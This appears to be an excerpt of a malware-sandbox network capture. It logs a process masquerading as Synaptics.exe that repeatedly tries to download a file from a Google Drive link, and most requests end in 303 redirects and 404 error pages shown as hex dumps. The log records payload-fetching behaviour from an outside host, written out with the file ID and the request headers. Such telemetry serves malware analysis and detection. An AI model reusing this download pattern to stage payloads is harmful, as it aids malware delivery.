                                                                                                                                                                            2024-12-30 10:49:26 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:26 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 30 77 6e 47 5a 55 64 73 30 62 76 6a 7a 51 4c 44 38 74 58 45 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="K0wnGZUds0bvjzQLD8tXEA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:26 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            55192.168.2.849807142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:26 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:26 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC52p6EgAv7eVuWBDy83xgMIMCWNQTEvA4Rt6o4of_Iaa_wWXy-ItXi0o1016LrCR2Dl
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:26 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-PaYn2esPOg2oPD55cvDejg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:26 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:26 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 45 53 49 33 33 4e 48 41 39 65 75 55 37 69 34 46 70 6a 6f 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="6ESI33NHA9euU7i4Fpjo0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:26 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            56192.168.2.849808142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:26 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:26 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-BZ7RW_abi7tbnzNMDj5f0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            57192.168.2.849806142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:26 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:26 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-iQTjCpLifis_gxfmykjoeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            58192.168.2.849811142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:26 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:27 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC4Pnzw6IC7dQs6vccov--bdohDXjI6ahqHo4iIAECQWQDH7SsAryJ2e9JOZtoQMKM7tywkr_7E
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:27 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-zzya00Vx86yFFFlw9_LHng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:27 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:27 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 33 38 6c 75 34 67 39 30 37 56 63 7a 4b 6b 50 35 37 6e 5a 56 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="338lu4g907VczKkP57nZVw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:27 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            59192.168.2.849812142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:27 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            60192.168.2.849814142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:27 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            61192.168.2.849813142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:27 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            62192.168.2.849816142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:28 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:28 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-dVWEwA6yaYCznEPQ2dfPow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            63192.168.2.849817142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:28 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:28 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-e2xqQAjGVGIc5JYkiN0ObA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            64192.168.2.849822142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
